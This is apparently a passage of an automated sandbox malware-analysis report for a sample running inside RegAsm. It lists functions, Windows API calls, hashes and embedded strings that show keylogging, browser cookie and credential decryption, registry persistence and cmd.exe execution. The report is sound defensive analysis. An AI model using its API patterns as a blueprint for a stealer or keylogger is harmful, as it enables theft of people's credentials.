                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                  • API String ID: 1174141254-1980882731
                                                                                                                                  • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                                                  • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                                                                  • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                                                  • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                                                                  Function 0040B19F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                  • wsprintfW.USER32 ref: 0040B22E
                                                                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EventLocalTimewsprintf
                                                                                                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                                                  • API String ID: 1497725170-1359877963
                                                                                                                                  • Opcode ID: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                                                                  • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                                                                  • Opcode Fuzzy Hash: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                                                                  • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                                                                  Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                  • String ID: Online Keylogger Started
                                                                                                                                  • API String ID: 112202259-1258561607
                                                                                                                                  • Opcode ID: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                                                                  • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                                                                  • Opcode Fuzzy Hash: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                                                                  • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                                                                  Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: CryptUnprotectData$crypt32
                                                                                                                                  • API String ID: 2574300362-2380590389
                                                                                                                                  • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                  • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                                                                  • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                  • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                                                                  Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                  • String ID: Connection Timeout
                                                                                                                                  • API String ID: 2055531096-499159329
                                                                                                                                  • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                                                  • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                                                                  • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                                                  • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                                                                  Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                  • API String ID: 2005118841-1866435925
                                                                                                                                  • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                  • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                                                  • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                  • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                                                  Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                                                                                  • RegSetValueExW.ADVAPI32 ref: 00413888
                                                                                                                                  • RegCloseKey.ADVAPI32(004752D8), ref: 00413893
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                  • String ID: pth_unenc
                                                                                                                                  • API String ID: 1818849710-4028850238
                                                                                                                                  • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                  • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                                                  • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                  • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                                                  Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                  • String ID: bad locale name
                                                                                                                                  • API String ID: 3628047217-1405518554
                                                                                                                                  • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                  • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                                                                  • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                  • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                                                  Function 00413656 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID: 8)3
                                                                                                                                  • API String ID: 3677997916-783258567
                                                                                                                                  • Opcode ID: cdbe77b62fdb326fa84ed0ef2b451dd3af455626e780c5cb96fc0720a69048d7
                                                                                                                                  • Instruction ID: b2ddc0a972744091932d43abea1e646d3cdf78111d27e2b843060007377f7c4f
                                                                                                                                  • Opcode Fuzzy Hash: cdbe77b62fdb326fa84ed0ef2b451dd3af455626e780c5cb96fc0720a69048d7
                                                                                                                                  • Instruction Fuzzy Hash: B7F04F75600218FBDF209B90DC05FDD7B7CEB04B15F1040A2BA45B5291DB749F949BA8
                                                                                                                                  Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                                    • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                                                                  • String ID: !D@
                                                                                                                                  • API String ID: 186401046-604454484
                                                                                                                                  • Opcode ID: bfcd2c8c1d2ae80447500fcbf9dc1f25f0f381f95e29ab0bb7edbe6635a3d2e1
                                                                                                                                  • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                                                                  • Opcode Fuzzy Hash: bfcd2c8c1d2ae80447500fcbf9dc1f25f0f381f95e29ab0bb7edbe6635a3d2e1
                                                                                                                                  • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                                                                  Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecuteShell
                                                                                                                                  • String ID: /C $cmd.exe$open
                                                                                                                                  • API String ID: 587946157-3896048727
                                                                                                                                  • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                                                  • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                                                  Function 0040B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                  • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                  • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                  • String ID: pth_unenc
                                                                                                                                  • API String ID: 3123878439-4028850238
                                                                                                                                  • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                  • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                                                                  • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                  • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                                                                  Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: GetCursorInfo$User32.dll
                                                                                                                                  • API String ID: 1646373207-2714051624
                                                                                                                                  • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                  • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                                                                  • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                  • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                                                                  Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetLastInputInfo$User32.dll
                                                                                                                                  • API String ID: 2574300362-1519888992
                                                                                                                                  • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                  • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                                                                  • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                  • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                                                                  Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                  • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                                                  • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                                                  Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                  • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                  • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                                                  • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                  • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                                                  Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                                                                  Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                                                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                  • API String ID: 3472027048-1236744412
                                                                                                                                  • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                                                  • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
